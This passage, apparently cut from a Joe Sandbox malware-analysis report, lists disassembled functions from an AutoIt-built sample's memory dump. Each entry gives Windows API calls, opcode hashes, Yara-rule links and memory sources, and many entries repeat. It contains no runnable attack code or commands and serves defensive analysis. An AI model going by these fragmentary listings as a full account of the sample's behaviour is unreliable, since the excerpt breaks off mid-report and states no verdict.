                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _memset$CloseCreateHandleProcess
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3277943733-0
                                                                                                                                                        • Opcode ID: 7f6d5ac1f86551135a549879648d1822c74cae2c62fc01103384eabce86671a7
                                                                                                                                                        • Instruction ID: 720d9048e14cddf1b3ced5491bbadfeb4c58f0b468035663f59de101dcbd9ca3
                                                                                                                                                        • Opcode Fuzzy Hash: 7f6d5ac1f86551135a549879648d1822c74cae2c62fc01103384eabce86671a7
                                                                                                                                                        • Instruction Fuzzy Hash: 26F05EF1940314BFF2105B65AC56FB77AECDB09BD6F404460FE04D62A2DBB68E1096B8
                                                                                                                                                        Function 00AD9C73 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 00AD9C7F
                                                                                                                                                          • Part of subcall function 00ADAD14: _memset.LIBCMT ref: 00ADAD49
                                                                                                                                                        • _memmove.LIBCMT ref: 00AD9CA2
                                                                                                                                                        • _memset.LIBCMT ref: 00AD9CAF
                                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 00AD9CBF
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 48991266-0
                                                                                                                                                        • Opcode ID: c4603c70a9e18edd7bbd82f8f9a3dfa93134dd2a64f10b2c107709de549019a4
                                                                                                                                                        • Instruction ID: 5987653c77608abc8222b898d6cff4e509a9cec37b9c7f56ed93f1ce77e675bb
                                                                                                                                                        • Opcode Fuzzy Hash: c4603c70a9e18edd7bbd82f8f9a3dfa93134dd2a64f10b2c107709de549019a4
                                                                                                                                                        • Instruction Fuzzy Hash: 26F03A7A200000AFCB016F54EC85A8ABB69EF45360B48C062FE099F217CB31E911DBB5
                                                                                                                                                        Function 00AFE83C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AAB58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00AAB5EB
                                                                                                                                                          • Part of subcall function 00AAB58B: SelectObject.GDI32(?,00000000), ref: 00AAB5FA
                                                                                                                                                          • Part of subcall function 00AAB58B: BeginPath.GDI32(?), ref: 00AAB611
                                                                                                                                                          • Part of subcall function 00AAB58B: SelectObject.GDI32(?,00000000), ref: 00AAB63B
                                                                                                                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00AFE860
                                                                                                                                                        • LineTo.GDI32(00000000,?,?), ref: 00AFE86D
                                                                                                                                                        • EndPath.GDI32(00000000), ref: 00AFE87D
                                                                                                                                                        • StrokePath.GDI32(00000000), ref: 00AFE88B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1539411459-0
                                                                                                                                                        • Opcode ID: 52f6c97f9a504e64f93cd04d545189185239c114e7bcdeeaeb3794678c8ac0ff
                                                                                                                                                        • Instruction ID: 88d76814d27a50def49ceb76c25ff75634059add615cc06fc72a55cd73476de2
                                                                                                                                                        • Opcode Fuzzy Hash: 52f6c97f9a504e64f93cd04d545189185239c114e7bcdeeaeb3794678c8ac0ff
                                                                                                                                                        • Instruction Fuzzy Hash: C4F05E31001259BBDB126F94AC0DFDE3F99AF0A311F448141FA11660E1CB795661DFE5
                                                                                                                                                        Function 00ACD623 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00ACD640
                                                                                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00ACD653
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00ACD65A
                                                                                                                                                        • AttachThreadInput.USER32(00000000), ref: 00ACD661
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2710830443-0
                                                                                                                                                        • Opcode ID: b523d696d34217a22061f9aa291002995b66b15f7efab47e338773a8d9e3ae1b
                                                                                                                                                        • Instruction ID: 485ece6d42f1f6f3df12c0afd2bed2512d24656aa7a08705c3329781bc43afdd
                                                                                                                                                        • Opcode Fuzzy Hash: b523d696d34217a22061f9aa291002995b66b15f7efab47e338773a8d9e3ae1b
                                                                                                                                                        • Instruction Fuzzy Hash: F4E0C971541228BADB215FA29C0DFDB7F6CEF567A1F808025BA0D96060DF759590CBA0
                                                                                                                                                        Function 00AAB0AC Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetSysColor.USER32(00000008), ref: 00AAB0C5
                                                                                                                                                        • SetTextColor.GDI32(?,000000FF), ref: 00AAB0CF
                                                                                                                                                        • SetBkMode.GDI32(?,00000001), ref: 00AAB0E4
                                                                                                                                                        • GetStockObject.GDI32(00000005), ref: 00AAB0EC
                                                                                                                                                        • GetWindowDC.USER32(?,00000000), ref: 00B0ECFA
                                                                                                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 00B0ED07
                                                                                                                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 00B0ED20
                                                                                                                                                        • GetPixel.GDI32(00000000,00000000,?), ref: 00B0ED39
                                                                                                                                                        • GetPixel.GDI32(00000000,?,?), ref: 00B0ED59
                                                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00B0ED64
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1946975507-0
                                                                                                                                                        • Opcode ID: 0112e45d84ee05934ac1ae0a8bc1bbe55cedf0fa08762686c1131e7625071da1
                                                                                                                                                        • Instruction ID: 3c40fd757340a1295701f1395ef0eb55a5514f532a0f6389c054ce41c737104d
                                                                                                                                                        • Opcode Fuzzy Hash: 0112e45d84ee05934ac1ae0a8bc1bbe55cedf0fa08762686c1131e7625071da1
                                                                                                                                                        • Instruction Fuzzy Hash: E1E0ED31500240BEEB215F74AC497D87F61EB56335F54C366F779690E2CB728590DB11
                                                                                                                                                        Function 00B0C0A0 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2889604237-0
                                                                                                                                                        • Opcode ID: 5aee4246f0e310978ef32db625cdaf9c503f8980b525f541665b55c6c9d2011b
                                                                                                                                                        • Instruction ID: a8506b95f566c5c8715c47eacf0d1418c8a7ccd072f55f08fe74fead2a896708
                                                                                                                                                        • Opcode Fuzzy Hash: 5aee4246f0e310978ef32db625cdaf9c503f8980b525f541665b55c6c9d2011b
                                                                                                                                                        • Instruction Fuzzy Hash: AFE092B5540204EFDB009F709888AA97FE9EB4C361F51C816F94A8B291EFB999819B50
                                                                                                                                                        Function 00B0C0B4 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2889604237-0
                                                                                                                                                        • Opcode ID: 6539d460f653930ba4a5f0478903f644191ef9b74096f53a3cfef466a717e8ef
                                                                                                                                                        • Instruction ID: d130eb19fe022b0d8f1e3afac55dcab2b4d2d0925db8b24ddb508c3bf435e453
                                                                                                                                                        • Opcode Fuzzy Hash: 6539d460f653930ba4a5f0478903f644191ef9b74096f53a3cfef466a717e8ef
                                                                                                                                                        • Instruction Fuzzy Hash: 1DE0B6B5940304EFDB009F70DC4C6A97BE9EB4C361F51C815F94ACB251DFB999818B50
                                                                                                                                                        Function 00B12350 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 475COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _memmove
                                                                                                                                                        • String ID: >$DEFINE
                                                                                                                                                        • API String ID: 4104443479-1664449232
                                                                                                                                                        • Opcode ID: 45ac7d665f12590a176ef06c1a2f40bdc064eced800e7bb99adadd18ee082041
                                                                                                                                                        • Instruction ID: 806c7863620b6bb0501ec060b98ac1946c11f3725342597ee90c7a9ebaf1b32c
                                                                                                                                                        • Opcode Fuzzy Hash: 45ac7d665f12590a176ef06c1a2f40bdc064eced800e7bb99adadd18ee082041
                                                                                                                                                        • Instruction Fuzzy Hash: 25124875A0021ADFCF24CF58C490AEDB7F1FF48310F65819AE859AB355E734A991CB90
                                                                                                                                                        Function 00ACEAD5 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • OleSetContainedObject.OLE32(?,00000001), ref: 00ACECA0
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ContainedObject
                                                                                                                                                        • String ID: AutoIt3GUI$Container
                                                                                                                                                        • API String ID: 3565006973-3941886329
                                                                                                                                                        • Opcode ID: 4120616445fd6d3c2750d464588300e099a9b15bbf340774d726250d4335f020
                                                                                                                                                        • Instruction ID: 6781de62abc386363d3392d34e65fc051c3efa0396bcacc9f8271a49525883d6
                                                                                                                                                        • Opcode Fuzzy Hash: 4120616445fd6d3c2750d464588300e099a9b15bbf340774d726250d4335f020
                                                                                                                                                        • Instruction Fuzzy Hash: 7A911774600701AFDB14DF68C884F6ABBF9BF49710B1585ADF94ACB291EB70E941CB60
                                                                                                                                                        Function 00ADE704 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 200shareCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A93BCF: _wcscpy.LIBCMT ref: 00A93BF2
                                                                                                                                                          • Part of subcall function 00A984A6: __swprintf.LIBCMT ref: 00A984E5
                                                                                                                                                          • Part of subcall function 00A984A6: __itow.LIBCMT ref: 00A98519
                                                                                                                                                        • __wcsnicmp.LIBCMT ref: 00ADE785
                                                                                                                                                        • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00ADE84E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                                                        • String ID: LPT
                                                                                                                                                        • API String ID: 3222508074-1350329615
                                                                                                                                                        • Opcode ID: 10095fac5129e515c59aa465d274441b007dbe14a6a7ad91ba058689cbc1c6fd
                                                                                                                                                        • Instruction ID: 1e825b852a1c720edc78d58f464aba1814e9f162bcdb6597e63e0388263f83ec
                                                                                                                                                        • Opcode Fuzzy Hash: 10095fac5129e515c59aa465d274441b007dbe14a6a7ad91ba058689cbc1c6fd
                                                                                                                                                        • Instruction Fuzzy Hash: 19615E75A00215AFDB14EB98C995EAEB7F8EF49310F04406AF546AF391DB70AE80DB50
                                                                                                                                                        Function 00A91B72 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • Sleep.KERNEL32(00000000), ref: 00A91B83
                                                                                                                                                        • GlobalMemoryStatusEx.KERNEL32 ref: 00A91B9C
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: GlobalMemorySleepStatus
                                                                                                                                                        • String ID: @
                                                                                                                                                        • API String ID: 2783356886-2766056989
                                                                                                                                                        • Opcode ID: 5dfb1cc48c84806ade90af1929c8595776bc9b2bd76d4aaaf7d11e3d3afeffd9
                                                                                                                                                        • Instruction ID: dced035544eadd9dd1f1afa8b9a494879275d2d1cf3c807f944d28f71384851c
                                                                                                                                                        • Opcode Fuzzy Hash: 5dfb1cc48c84806ade90af1929c8595776bc9b2bd76d4aaaf7d11e3d3afeffd9
                                                                                                                                                        • Instruction Fuzzy Hash: 94514871408745ABE720AF14D885BABBBE8FB9A354F81484DF1C8420A1EF75996C8763
                                                                                                                                                        Function 00ADCE59 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A9417D: __fread_nolock.LIBCMT ref: 00A9419B
                                                                                                                                                        • _wcscmp.LIBCMT ref: 00ADCF49
                                                                                                                                                        • _wcscmp.LIBCMT ref: 00ADCF5C
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
